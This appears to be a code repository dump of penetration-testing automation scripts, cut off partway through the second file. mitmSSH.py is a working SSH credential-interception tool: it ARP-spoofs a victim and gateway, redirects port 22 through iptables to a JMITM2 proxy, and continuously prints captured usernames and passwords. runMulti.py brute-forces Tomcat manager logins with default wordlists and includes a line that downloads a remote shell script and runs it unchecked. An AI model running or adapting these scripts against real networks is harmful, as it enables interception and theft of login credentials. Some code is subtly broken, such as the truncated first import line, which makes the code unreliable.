├── README.md ├── mitmSSH.py ├── runMulti.py ├── runSSHmulti.py └── runSSLmulti.py /README.md: -------------------------------------------------------------------------------- 1 | pentest_automation 2 | ================== 3 | mitmSSH.py 4 | Automates the process of ARP spoofing and setting up JMITM2 5 | 6 | Reference: http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ 7 | 8 | -------------------------------------------------------------------------------- /mitmSSH.py: -------------------------------------------------------------------------------- 1 | rom optparse import OptionParser 2 | from scapy.all import * 3 | from subprocess import Popen, PIPE, call 4 | from threading import Timer 5 | import argparse 6 | import commands 7 | import inspect, os, sys 8 | import re 9 | import shlex 10 | import signal 11 | import subprocess, datetime, os, time, signal 12 | import threading 13 | import time 14 | import traceback 15 | 16 | passwordList = [] 17 | 18 | defaultHostMac = '' 19 | defaultGatewayMac = '' 20 | defaultHostIP = '' 21 | defaultGatewayIP = '' 22 | 23 | #currentPath=os.getcwd() 24 | currentPath="/tmp1/tools" 25 | origPath=os.getcwd() 26 | 27 | def signal_handler(signal, frame): 28 | print('\nYou pressed Ctrl+C!') 29 | 30 | #Kill ARP Spoofing 31 | cmd = "pkill -f intercepter" 32 | commands.getoutput(cmd) 33 | cmd = "killall -15 screen" 34 | commands.getoutput(cmd) 35 | 36 | #Flushing IPTables 37 | cmd = "iptables -F" 38 | commands.getoutput(cmd) 39 | 40 | print "[*] Restoring ARP" 41 | #print defaultHostIP, defaultHostMac 42 | #print defaultGatewayIP, defaultGatewayMac 43 | send(ARP(op=2, pdst=defaultGatewayIP, psrc=defaultHostIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=defaultHostMac), count=3, verbose=False) 44 | send(ARP(op=2, pdst=defaultHostIP, psrc=defaultGatewayIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=defaultGatewayMac), count=3, verbose=False) 45 | 46 | sys.exit(0) 47 | 48 | def getMac(ip): 49 | Popen(["ping", "-c 1", str(ip)], stdout = PIPE) 50 | pid = Popen(["arp", "-n", str(ip)], stdout = PIPE) 51 | s = pid.communicate()[0] 52 | mac = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0] 53 | return str(ip),str(mac) 54 | 55 | def decorateScreenStringWindow(screenname, id, a): 56 | return "screen -x " + screenname + " -p"+ str(id) +" -X stuff " +"'"+ a + "\r'" 57 | 58 | def decorateDefaultString( screenname, a): 59 | return "screen -x " + screenname + " -X " + a 60 | 61 | def create_screen(sname, windowname = "bash"): 62 | createscreen = ["screen -d -m -S "+ sname + " -t " + windowname] 63 | p = subprocess.Popen(createscreen,shell=True) 64 | 65 | def run_cmd_screen(sname, id, command): 66 | cmd = [decorateScreenStringWindow(sname, id, command)] 67 | subprocess.Popen(cmd, shell=True) 68 | time.sleep(0.3) 69 | 70 | def create_window(sname, windowname): 71 | cmd = [decorateDefaultString(sname, " screen -t \"" + windowname + "\" ")] 72 | subprocess.Popen(cmd, shell=True) 73 | time.sleep(0.2) 74 | 75 | def downloadFiles(): 76 | cmdList=[] 77 | if not os.path.exists(currentPath+"/jmitm2-0.1.0/bin/runm.sh"): 78 | cmd="wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz" 79 | cmdList.append(cmd) 80 | cmd="tar xvfz jmitm2-0.1.0.tar.gz" 81 | cmdList.append(cmd) 82 | else: 83 | cmd="tar xvfz jmitm2-0.1.0.tar.gz" 84 | cmdList.append(cmd) 85 | for cmd in cmdList: 86 | #print cmd 87 | os.chdir(currentPath) 88 | commands.getoutput(cmd).strip() 89 | 90 | cmdList=[] 91 | if not os.path.exists(currentPath+"/intercepter_linux"): 92 | cmd="wget http://intercepter.nerf.ru/Intercepter-NG.CE.05.zip" 93 | cmdList.append(cmd) 94 | cmd="unzip -o Intercepter-NG.CE.05.zip" 95 | cmdList.append(cmd) 96 | cmd="chmod 755 "+currentPath+"/intercepter_linux" 97 | cmdList.append(cmd) 98 | else: 99 | cmd="unzip -o Intercepter-NG.CE.05.zip" 100 | cmdList.append(cmd) 101 | cmd="chmod 755 intercepter_linux" 102 | cmdList.append(cmd) 103 | for cmd in cmdList: 104 | #print cmd 105 | os.chdir(currentPath) 106 | commands.getoutput(cmd).strip() 107 | 108 | #if not os.path.exists(currentPath+"/PCredz/Pcredz"): 109 | # cmd="git clone https://github.com/lgandx/PCredz.git" 110 | # print cmd 111 | # os.chdir(currentPath) 112 | # commands.getoutput(cmd).strip() 113 | 114 | def runWithTimeOut(command,timeout): 115 | cmd = command.split(" ") 116 | start = datetime.datetime.now() 117 | process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 118 | while process.poll() is None: 119 | time.sleep(0.1) 120 | now = datetime.datetime.now() 121 | if (now - start).seconds > timeout: 122 | os.kill(process.pid, signal.SIGKILL) 123 | os.waitpid(-1, os.WNOHANG) 124 | return None 125 | return process.stdout.read() 126 | print stderr 127 | 128 | def get_process_children(pid): 129 | p = Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True,stdout = PIPE, stderr = PIPE) 130 | stdout, stderr = p.communicate() 131 | return [int(p) for p in stdout.split()] 132 | 133 | def runCommands(host_addr,gatewayIP): 134 | cmd = "pkill -f intercepter" 135 | commands.getoutput(cmd) 136 | #cmd = "pkill -f Pcredz" 137 | #commands.getoutput(cmd) 138 | cmd = "pkill -f j2ssh" 139 | commands.getoutput(cmd) 140 | 141 | cmd = "killall -15 screen" 142 | commands.getoutput(cmd) 143 | 144 | create_screen("intercepter","intercepter") 145 | #create_screen("pcredz","pcredz") 146 | create_screen("jmitm","pcredz") 147 | 148 | cmdList=[] 149 | cmd = "echo 1 > /proc/sys/net/ipv4/ip_forward" 150 | cmdList.append(cmd) 151 | cmd = "iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2200" 152 | #cmd = "iptables -A PREROUTING -t nat -p tcp --dport 22 -j REDIRECT --to-port 2200" 153 | #cmd = "iptables -A PREROUTING -t nat -i eth0 -p tcp --src "+host_addr+" --dport 22 -j REDIRECT --to-port 2200" 154 | cmdList.append(cmd) 155 | cmd = "iptables -A FORWARD -j ACCEPT" 156 | cmdList.append(cmd) 157 | cmd = "iptables-save" 158 | cmdList.append(cmd) 159 | cmd = currentPath+"/intercepter_linux 1 1" 160 | #cmd = currentPath+"/intercepter_linux 1 1 w -gw "+gatewayIP+" -t1 "+host_addr 161 | cmdList.append(cmd) 162 | for cmd in cmdList: 163 | #print cmd 164 | run_cmd_screen("intercepter",0,cmd) 165 | 166 | #cmdList=[] 167 | #cmd = "cd "+currentPath+"/PCredz && python2.7 Pcredz -i eth0" 168 | #print cmd 169 | #cmdList.append(cmd) 170 | #for cmd in cmdList: 171 | # run_cmd_screen("pcredz",0,cmd) 172 | 173 | cmdList=[] 174 | cmd = "cd "+currentPath+"/jmitm2-0.1.0/bin && sh runm.sh | tee jmitm2.log" 175 | #print cmd 176 | cmdList.append(cmd) 177 | for cmd in cmdList: 178 | run_cmd_screen("jmitm",0,cmd) 179 | 180 | os.chdir(origPath) 181 | 182 | def analyzeNetwork(targetPort): 183 | print "[*] Analyzing network" 184 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 185 | ethIP = commands.getoutput(cmd).strip() 186 | 187 | #Flushing IPTables 188 | cmd = "iptables -F" 189 | commands.getoutput(cmd) 190 | 191 | #Run ARP Spoofing 192 | cmd = "pkill -f intercepter" 193 | commands.getoutput(cmd) 194 | cmd = "killall -15 screen" 195 | commands.getoutput(cmd) 196 | 197 | create_screen("intercepter","intercepter") 198 | cmdList=[] 199 | cmd = "echo 1 > /proc/sys/net/ipv4/ip_forward" 200 | cmdList.append(cmd) 201 | cmd = "iptables -A FORWARD -j ACCEPT" 202 | cmdList.append(cmd) 203 | cmd = currentPath+"/intercepter_linux 1 1" 204 | #print cmd 205 | cmdList.append(cmd) 206 | for cmd in cmdList: 207 | run_cmd_screen("intercepter",0,cmd) 208 | 209 | #Remove temp file 210 | tempFilename = "/tmp/out" 211 | if os.path.exists(tempFilename): 212 | os.remove(tempFilename) 213 | #cmd = "tshark -i eth0 -T fields -e ip.src -e ip.dst" 214 | 215 | #Checking if Network is Vulnerable to ARP Spoofing 216 | #Add Code Here 217 | 218 | #Checking for SSH traffic 219 | cmd = "tshark -i eth0 port "+targetPort+" and host not "+ethIP+" -T fields -e ip.src -e ip.dst -e tcp.port 2>&1 >> "+tempFilename 220 | newCmd = "bash -c '(sleep 20; pkill -f tshark) & "+cmd+"'" 221 | 222 | #newCmd = "perl -e 'alarm 10; exec @ARGV' '"+cmd+"'" 223 | #print cmd 224 | 225 | #print runWithTimeOut(cmd,20) 226 | commands.getoutput(newCmd) 227 | 228 | #time.sleep(5) 229 | targetHosts=[] 230 | sourceHosts=[] 231 | if os.path.exists(tempFilename): 232 | lines=[] 233 | with open(tempFilename) as f: 234 | lines = f.read().splitlines() 235 | if len(lines)<1: 236 | print "[!!] No port: "+targetPort+" connections detected" 237 | else: 238 | for line in lines: 239 | host = line.split("\t") 240 | sourceIP = host[0].strip() 241 | targetIP = host[1].strip() 242 | 243 | srcPort = (host[2].split(",")[0]).strip() 244 | tgtPort = (host[2].split(",")[1]).strip() 245 | 246 | if srcPort==targetPort: 247 | if [sourceIP,targetIP] not in targetHosts: 248 | targetHosts.append([sourceIP,targetIP]) 249 | return targetHosts 250 | #for x in targetHosts: 251 | # print x[0]+"\t"+x[1] 252 | else: 253 | print "[!] No port: "+targetPort+" connections detected" 254 | 255 | 256 | #Kill ARP Spoofing 257 | cmd = "pkill -f intercepter" 258 | commands.getoutput(cmd) 259 | cmd = "killall -15 screen" 260 | commands.getoutput(cmd) 261 | 262 | #Flushing IPTables 263 | cmd = "iptables -F" 264 | commands.getoutput(cmd) 265 | 266 | def modifyConfiguration(host_addr,ssh_addr,currentIP): 267 | configFile = currentPath+"/jmitm2-0.1.0/bin/conf/server.xml" 268 | content=[] 269 | newContent=[] 270 | with open(configFile) as f: 271 | content = f.readlines() 272 | for x in content: 273 | if "" in x: 274 | x = ""+currentIP+"" 275 | newContent.append(x) 276 | f = open(configFile, 'w') 277 | for x in newContent: 278 | f.write(x) 279 | f.close() 280 | 281 | configFile = currentPath+"/jmitm2-0.1.0/bin/runm.sh" 282 | f = open(configFile, 'w') 283 | f.write("CLASSPATH=$CLASSPATH:$PWD:$PWD/lib/log4j-1.2.6.jar java -Dsshtools.home=$PWD com.sshtools.j2ssh.MitmGlue "+ssh_addr+" 22") 284 | f.close() 285 | 286 | if __name__ == '__main__': 287 | parser = argparse.ArgumentParser() 288 | parser.add_argument('-analyze', action='store_true', help='[analyze network for ssh traffic]') 289 | parser.add_argument('-port', dest='port_no', action='store', help='[port of SSH server]') 290 | parser.add_argument('-host', dest='host_addr', action='store', help='[ip address of internal host]') 291 | parser.add_argument('-ssh', dest='ssh_addr', action='store', help='[ip address of ssh server]') 292 | 293 | options = parser.parse_args() 294 | if not options.analyze and not options.ssh_addr and not options.host_addr: 295 | cmd = "pkill -f intercepter" 296 | commands.getoutput(cmd) 297 | cmd = "pkill -f Pcredz" 298 | commands.getoutput(cmd) 299 | cmd = "pkill -f j2ssh" 300 | commands.getoutput(cmd) 301 | 302 | cmd = "killall -15 screen" 303 | commands.getoutput(cmd) 304 | 305 | cmd = "iptables --flush" 306 | commands.getoutput(cmd) 307 | 308 | parser.print_help() 309 | sys.exit(1) 310 | signal.signal(signal.SIGINT, signal_handler) 311 | if options.analyze and not options.port_no: 312 | downloadFiles() 313 | 314 | targetPort=22 315 | targetHosts=analyzeNetwork(str(targetPort)) 316 | if targetHosts!=None: 317 | if len(targetHosts)>0: 318 | for host in targetHosts: 319 | #print host[0]+"\t"+host[1] 320 | print "**********************************************************" 321 | print "Found the below SSH connections" 322 | print "Host: "+host[1]+"\tSSH Server: "+host[0] 323 | print "**********************************************************" 324 | #cmd = "python2.7 mitmSSH.py -host "+host[1]+" -ssh "+host[0] 325 | #print cmd 326 | #''' 327 | for host in targetHosts: 328 | ssh_addr = host[0] 329 | host_addr = host[1] 330 | 331 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 332 | ethIP = commands.getoutput(cmd).strip() 333 | 334 | print "[*] MITMing Target IP: "+host_addr+" and SSH server: "+ssh_addr 335 | modifyConfiguration(host_addr,ssh_addr,ethIP) 336 | 337 | cmd = "/sbin/ip route | awk '/default/ { print $3 }'" 338 | gatewayIP = commands.getoutput(cmd).strip() 339 | 340 | runCommands(host_addr,gatewayIP) 341 | 342 | defaultGatewayIP, defaultGatewayMac = getMac(str(gatewayIP)) 343 | defaultHostIP, defaultHostMac = getMac(str(host_addr)) 344 | 345 | 346 | print "[*] Checking jmitm2.log for login attempts" 347 | while True: 348 | #Check jmitm2.log for login attempts 349 | cmd = "cat "+currentPath+"/jmitm2-0.1.0/bin/jmitm2.log | grep -i 'mitm: username/password'" 350 | results = commands.getoutput(cmd).strip() 351 | resultsList = results.split("\n") 352 | for i in resultsList: 353 | try: 354 | result = i.split("- mitm:")[1].strip() 355 | if result not in passwordList: 356 | print result 357 | passwordList.append(result) 358 | except IndexError: 359 | continue 360 | time.sleep(1) 361 | #''' 362 | else: 363 | print "[!!!] No port: "+str(targetPort)+" traffic detected or network not vulnerable to ARP spoofing" 364 | elif options.analyze and options.port_no: 365 | downloadFiles() 366 | 367 | targetPort=options.port_no 368 | targetHosts=analyzeNetwork(str(targetPort)) 369 | if targetHosts!=None: 370 | if len(targetHosts)>0: 371 | for host in targetHosts: 372 | print host[0]+"\t"+host[1] 373 | print "**********************************************************" 374 | print "Found the below SSH connections" 375 | print "Host: "+host[1]+"\tSSH Server: "+host[0] 376 | print "**********************************************************" 377 | #cmd = "python2.7 mitmSSH.py -host "+host[1]+" -ssh "+host[0] 378 | #print cmd 379 | #''' 380 | if options.port_no=="22": 381 | for host in targetHosts: 382 | ssh_addr = host[0] 383 | host_addr = host[1] 384 | 385 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 386 | ethIP = commands.getoutput(cmd).strip() 387 | 388 | print "[*] MITMing Target IP: "+host_addr+" and SSH server: "+ssh_addr 389 | modifyConfiguration(host_addr,ssh_addr,ethIP) 390 | runCommands(options.host_addr,gatewayIP) 391 | 392 | defaultGatewayIP, defaultGatewayMac = getMac(str(gatewayIP)) 393 | defaultHostIP, defaultHostMac = getMac(str(options.host_addr)) 394 | 395 | print "[*] Checking jmitm2.log for login attempts" 396 | while True: 397 | #Check jmitm2.log for login attempts 398 | cmd = "cat "+currentPath+"/jmitm2-0.1.0/bin/jmitm2.log | grep -i 'mitm: username/password'" 399 | results = commands.getoutput(cmd).strip() 400 | resultsList = results.split("\n") 401 | for i in resultsList: 402 | try: 403 | result = i.split("- mitm:")[1].strip() 404 | if result not in passwordList: 405 | print result 406 | passwordList.append(result) 407 | except IndexError: 408 | continue 409 | time.sleep(1) 410 | #''' 411 | else: 412 | print "[!!!!] No port: "+str(targetPort)+" traffic detected or network not vulnerable to ARP spoofing" 413 | else: 414 | downloadFiles() 415 | cmd = "/sbin/ip route | awk '/default/ { print $3 }'" 416 | gatewayIP = commands.getoutput(cmd).strip() 417 | 418 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 419 | ethIP = commands.getoutput(cmd).strip() 420 | 421 | modifyConfiguration(options.host_addr,options.ssh_addr,ethIP) 422 | runCommands(options.host_addr,gatewayIP) 423 | 424 | defaultGatewayIP, defaultGatewayMac = getMac(str(gatewayIP)) 425 | defaultHostIP, defaultHostMac = getMac(str(options.host_addr)) 426 | 427 | print "[*] Checking jmitm2.log for login attempts" 428 | while True: 429 | #Check jmitm2.log for login attempts 430 | cmd = "cat "+currentPath+"/jmitm2-0.1.0/bin/jmitm2.log | grep -i 'mitm: username/password'" 431 | results = commands.getoutput(cmd).strip() 432 | resultsList = results.split("\n") 433 | for i in resultsList: 434 | try: 435 | result = i.split("- mitm:")[1].strip() 436 | if result not in passwordList: 437 | print result 438 | passwordList.append(result) 439 | except IndexError: 440 | continue 441 | time.sleep(1) 442 | 443 | 444 | 445 | -------------------------------------------------------------------------------- /runMulti.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | #Prequisites 3 | #gem install ruby-nmap 4 | #gem install net-http-persistent 5 | #gem install colorize 6 | #gem install text-table 7 | #gem install mechanize 8 | 9 | #wget http://www.python.org/ftp/python/2.7.6/Python-2.7.6.tgz 10 | #tar -xzf Python-2.7.6.tgz 11 | #cd Python-2.7.6 12 | #./configure && make && make install 13 | 14 | #wget https://bootstrap.pypa.io/get-pip.py 15 | #python2.7 get-pip.py 16 | #pip2.7 install -r /tmp1/tools/clusterd/requirements.txt 17 | 18 | try: 19 | import argparse 20 | except: 21 | print "wget https://pypi.python.org/packages/source/s/setuptools/setuptools-7.0.tar.gz --no-check-certificate && tar xvfz setuptools-7.0.tar.gz && cd setuptools-7.0 && python setup.py install" 22 | print "wget https://pypi.python.org/packages/source/a/argparse/argparse-1.2.1.tar.gz --no-check-certificate && tar xvfz argparse-1.2.1.tar.gz && cd argparse-1.2.1 && python setup.py install" 23 | sys.exit() 24 | import urllib2 25 | import socket 26 | import datetime 27 | import time 28 | import multiprocessing 29 | import commands 30 | import sys 31 | import os 32 | import glob 33 | import re 34 | import httplib 35 | import urllib 36 | import urlparse 37 | 38 | origPath = os.getcwd() 39 | toolsPath = "/tmp1/tools/" 40 | burpPath = "/pentest/burp/carbonator/" 41 | sslCCSPath = toolsPath 42 | yasuoPath = toolsPath+"/yasuo-master/" 43 | clusterdPath = toolsPath+"/clusterd/" 44 | whatwebPath = toolsPath+"/WhatWeb/" 45 | wpscanPath = toolsPath+"/wpscan/" 46 | peepingTomPath = toolsPath+"/peepingtom/" 47 | shellShockPath = toolsPath+"/shocker-master/" 48 | tlssledPath = toolsPath+"/" 49 | fuzzdbPath = toolsPath+"/fuzzdb-read-only/" 50 | patatorPath = toolsPath+"/patator/" 51 | tildePath = toolsPath+"/IIS-ShortName-Scanner/" 52 | vpnPath = "/pentest/vpn/ikeforce/" 53 | 54 | taskToRun="" 55 | domainName="" 56 | numProcesses=10 57 | 58 | def checkForASA(host): 59 | url = "https://"+host+"/+CSCOE+/logon.html" 60 | urlparse.urlparse(host) 61 | try: 62 | c = httplib.HTTPSConnection(host,timeout=10) 63 | c.request("HEAD", "/+CSCOE+/logon.html") 64 | response = c.getresponse() 65 | if response.status==200: 66 | return True 67 | except: 68 | return False 69 | 70 | 71 | def downloadFiles(): 72 | import urllib 73 | if not os.path.exists(toolsPath): 74 | #Create folder 75 | cmd = "mkdir "+toolsPath 76 | commands.getoutput(cmd) 77 | 78 | #Download shell script and download prerequisites 79 | cmd = "wget https://raw.githubusercontent.com/milo2012/pentest_automation/master/prequisites.sh && chmod 755 prerequisites.sh && sh prequisites.sh" 80 | commands.getoutput(cmd) 81 | 82 | if not os.path.exists(toolsPath+"/JBoss.fuzz.txt"): 83 | cmd = "cd "+toolsPath+" && wget https://fuzzdb.googlecode.com/svn-history/r158/trunk/discovery/PredictableRes/JBoss.fuzz.txt" 84 | commands.getoutput(cmd) 85 | if not os.path.exists(toolsPath+"/ApacheTomcat.fuzz.txt"): 86 | cmd = "cd "+toolsPath+" && wget https://fuzzdb.googlecode.com/svn-history/r158/trunk/discovery/PredictableRes/ApacheTomcat.fuzz.txt" 87 | commands.getoutput(cmd) 88 | 89 | if not os.path.exists(toolsPath+"/peepingtom"): 90 | cmd = "cd "+toolsPath+" && git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git" 91 | commands.getoutput(cmd) 92 | 93 | cmd = "cd "+toolsPath+" && wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2" 94 | commands.getoutput(cmd) 95 | cmd = "cd "+toolsPath+" && bunzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2" 96 | commands.getoutput(cmd) 97 | cmd = "cd "+toolsPath+" && tar xvf phantomjs-1.9.8-linux-i686.tar" 98 | commands.getoutput(cmd) 99 | cmd = "cd "+toolsPath+" && cp phantomjs-1.9.8-linux-i686/bin/phantomjs "+toolsPath+"/peepingtom" 100 | commands.getoutput(cmd) 101 | 102 | if not os.path.exists(toolsPath+"/clusterd"): 103 | cmd = "cd "+toolsPath+" && git clone https://github.com/hatRiot/clusterd.git" 104 | commands.getoutput(cmd) 105 | 106 | if not os.path.exists(toolsPath+"/wordList_ssh_hydra.txt"): 107 | testfile = urllib.URLopener() 108 | testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh_hydra.txt",toolsPath+"wordList_ssh_hydra.txt") 109 | 110 | #if not os.path.exists(toolsPath+"/wordList_ssh.txt"): 111 | # testfile = urllib.URLopener() 112 | # testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh.txt", toolsPath+"wordList_ssh.txt") 113 | #if not os.path.exists(toolsPath+"/wordList_telnet.txt"): 114 | # testfile = urllib.URLopener() 115 | # testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_telnet.txt", toolsPath+"wordList_telnet.txt") 116 | 117 | def timeout_command(command, timeout): 118 | import subprocess, datetime, os, time, signal 119 | start = datetime.datetime.now() 120 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 121 | while process.poll() is None: 122 | time.sleep(0.1) 123 | now = datetime.datetime.now() 124 | if (now - start).seconds> timeout: 125 | os.kill(process.pid, signal.SIGKILL) 126 | os.waitpid(-1, os.WNOHANG) 127 | return None 128 | return process.stdout.read() 129 | 130 | def RunCommand(fullCmd): 131 | #fullCmd += "& sleep 300; kill $!" 132 | try: 133 | return commands.getoutput(fullCmd) 134 | except: 135 | return "Error executing command %s" %(fullCmd) 136 | class Worker1(multiprocessing.Process): 137 | 138 | def __init__(self, 139 | work_queue, 140 | result_queue, 141 | ): 142 | multiprocessing.Process.__init__(self) 143 | self.work_queue = work_queue 144 | self.result_queue = result_queue 145 | self.kill_received = False 146 | def run(self): 147 | while (not (self.kill_received)) and (self.work_queue.empty()==False): 148 | try: 149 | job = self.work_queue.get_nowait() 150 | except: 151 | break 152 | (jobid,jobTitle,hostNo,runCmd) = job 153 | runCmd.split(" ") 154 | #rtnVal = (jobid,jobTitle,hostNo,timeout_command(runCmdList,120)) 155 | rtnVal = (jobid,jobTitle,hostNo,RunCommand(runCmd)) 156 | self.result_queue.put(rtnVal) 157 | 158 | def bruteForceTomcat(url): 159 | finalList=[] 160 | url1 = url.replace("/manager/html","") 161 | if not os.path.exists(origPath+"/tomcat_mgr_default_pass.txt"): 162 | urllib.urlretrieve("https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/wordlists/tomcat_mgr_default_pass.txt","tomcat_mgr_default_pass.txt") 163 | if not os.path.exists(origPath+"/tomcat_mgr_default_users.txt"): 164 | urllib.urlretrieve("https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/wordlists/tomcat_mgr_default_users.txt","tomcat_mgr_default_users.txt") 165 | 166 | if "https" in url: 167 | url2 = url1.replace("https://","") 168 | hostList = url2.split(":") 169 | hostNo = hostList[0].strip() 170 | portNo = hostList[1].strip() 171 | logFilename = origPath+"/runPatator_brute_tomcat_https_"+hostNo+"_"+portNo 172 | else: 173 | url2 = url1.replace("http://","") 174 | hostList = url2.split(":") 175 | hostNo = hostList[0].strip() 176 | portNo = hostList[1].strip() 177 | logFilename = origPath+"/runPatator_brute_tomcat_https_"+hostNo+"_"+portNo 178 | 179 | fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz --threads="+str(numProcesses)+" method=HEAD url="+url+" user_pass=FILE0:FILE1 0="+origPath+"/tomcat_mgr_default_users.txt 1="+origPath+"/tomcat_mgr_default_pass.txt -l "+logFilename 180 | if not os.path.exists(logFilename): 181 | print "- Bruteforce Tomcat Logins on "+url 182 | #print fullCmd 183 | results = RunCommand(fullCmd) 184 | resultsList = results.split("\n") 185 | for x in resultsList: 186 | if "200" in x: 187 | finalList.append(x) 188 | #if ("200" in x or "401" in x): 189 | # print x 190 | return finalList 191 | 192 | def parseLogs(): 193 | print "\n****** Parsing File/Directory Bruteforce Logs (Patator) ******" 194 | filename = "runPatator_*" 195 | for file in glob.glob(filename): 196 | parseFilename = file.split("_") 197 | scheme = parseFilename[1] 198 | ipAddr = parseFilename[2] 199 | portNo = parseFilename[3] 200 | url = scheme+"://"+ipAddr+":"+portNo 201 | 202 | lines=[] 203 | with open(file+"/RESULTS.csv") as f: 204 | lines = f.read().splitlines() 205 | count=0 206 | resultList=[] 207 | for line in lines: 208 | line1 = line.split(",") 209 | uriPath = line1[-3] 210 | status = line1[-1] 211 | if ("200" in status or "401" in status) and len(uriPath)>0: 212 | #if ("301" not in status and "500" not in status and "302" not in status and "404" not in status and "Unexpected" not in status) and "HTTP" in status: 213 | resultList.append(url+uriPath+"\t\t"+status) 214 | if uriPath=="/manager/html": 215 | tomcatFoundList.append(url+uriPath+"\t\t"+status) 216 | count+=1 217 | if count<10: 218 | for x in resultList: 219 | print x 220 | fileCount=0 221 | filename = "runPatator_brute_tomcat_*" 222 | for file in glob.glob(filename): 223 | fileCount+=1 224 | if fileCount<1: 225 | print "\n****** Found Tomcat Manager Console ****** " 226 | for x in tomcatFoundList: 227 | print x 228 | print "\n****** Testing Default Tomcat Credentials ******" 229 | finalList=[] 230 | tempList=[] 231 | for x in tomcatFoundList: 232 | x1 = x.split("\t")[0] 233 | tempList=bruteForceTomcat(x1) 234 | if len(tempList)<1: 235 | print "- No results found" 236 | else: 237 | for y in tempList: 238 | print y 239 | else: 240 | print "\n****** Testing Default Tomcat Credentials ******" 241 | filename = "runPatator_brute_tomcat_*" 242 | for file in glob.glob(filename): 243 | parseFilename = file.split("_") 244 | scheme = parseFilename[3].strip() 245 | ipAddr = parseFilename[4].strip() 246 | portNo = parseFilename[5].strip() 247 | url = scheme+"://"+ipAddr+":"+portNo 248 | url = url.strip() 249 | 250 | lines=[] 251 | with open(file+"/RESULTS.csv") as f: 252 | lines = f.read().splitlines() 253 | resultList=[] 254 | for line in lines: 255 | if "200" in line: 256 | line1 = line.split(",") 257 | creds = line1[-3].strip() 258 | status = line1[-1].strip() 259 | resultList.append(url+"\t"+creds+"\t"+status) 260 | print "- Bruteforce Tomcat Logins on "+url+"/manager/html" 261 | if len(resultList)>0: 262 | for x in resultList: 263 | print x 264 | else: 265 | print "- No results found" 266 | 267 | #Parsing Yasuo Log Files 268 | filename = "runYasuo_*.log" 269 | failedList=[] 270 | vulnList=[] 271 | for file in glob.glob(filename): 272 | lines=[] 273 | with open(file) as f: 274 | lines = f.read().splitlines() 275 | for x in lines: 276 | if "| http" in x: 277 | if x not in vulnList: 278 | vulnList.append(x) 279 | if len(vulnList)>0: 280 | print "\n****** Found the below applications ****** " 281 | for x in vulnList: 282 | print x 283 | 284 | 285 | #Parsing Tlssled Log Files 286 | filename = "runSSLTlssled_*.log" 287 | 288 | failedList=[] 289 | weakCipherList=[] 290 | renegotiationSecureList=[] 291 | renegotiationInsecureList=[] 292 | renegotiationTempList=[] 293 | sslv3List=[] 294 | sslv2List=[] 295 | for file in glob.glob(filename): 296 | lines=[] 297 | with open(file) as f: 298 | lines = f.read().splitlines() 299 | tempTitle="" 300 | renegType="" 301 | for line in lines: 302 | line = line.strip() 303 | if "[*] Running sslscan on " in line: 304 | tempTitle = line 305 | tempTitle = tempTitle.replace("[*] Running sslscan on ","") 306 | tempTitle = tempTitle.replace(" ...","") 307 | if "[!] ERROR: The target service " in line: 308 | line = line.replace("[!] ERROR: The target service ","") 309 | line = line.replace("does not seem","") 310 | line = line.replace("to speak SSL/TLS or it is not reachable!!","") 311 | line = line.strip() 312 | if line not in failedList: 313 | failedList.append(line) 314 | if (" 40 bits " in line or " 56 bits " in line) and "Accepted " in line: 315 | if tempTitle not in weakCipherList: 316 | weakCipherList.append(tempTitle) 317 | if "Secure Renegotiation IS supported" in line: 318 | if tempTitle not in renegotiationTempList: 319 | renegotiationTempList.append(tempTitle) 320 | if "Testing for client initiated (CI) SSL/TLS renegotiation (secure)..." in line: 321 | renegType = "secure" 322 | if "Testing for client initiated (CI) SSL/TLS renegotiation (insecure)..." in line: 323 | renegType = "insecure" 324 | if "(CI) SSL/TLS renegotiation IS enabled" in line: 325 | if tempTitle not in renegotiationSecureList and renegType=="secure" and tempTitle in renegotiationTempList: 326 | renegotiationSecureList.append(tempTitle) 327 | if tempTitle not in renegotiationInsecureList and renegType=="insecure" and tempTitle in renegotiationTempList: 328 | renegotiationInsecureList.append(tempTitle) 329 | if " SSLv3" in line and "Accepted" in line: 330 | if tempTitle not in sslv3List: 331 | sslv3List.append(tempTitle) 332 | if " SSLv2" in line and "Accepted" in line: 333 | if tempTitle not in sslv2List: 334 | sslv2List.append(tempTitle) 335 | if len(failedList)>0: 336 | print "\n****** TLSSLed Scan Failure ****** " 337 | for x in failedList: 338 | print x 339 | y = x.split(":") 340 | filename = origPath+"/runSSLTlssled_"+y[0]+"_"+y[1]+".log" 341 | os.remove(filename) 342 | print "Please rerun 'python2.7 runMulti.py -tasks tlssled' to retest failed hosts" 343 | if len(weakCipherList)>0: 344 | print "\n****** Weak TLS/SSL Ciphers ****** " 345 | for x in weakCipherList: 346 | print x 347 | secureAndInsecureList=[] 348 | secureList=[] 349 | insecureList=[] 350 | 351 | for x in renegotiationSecureList: 352 | if x in renegotiationInsecureList: 353 | if x not in secureAndInsecureList: 354 | secureAndInsecureList.append(x) 355 | else: 356 | if x not in secureList: 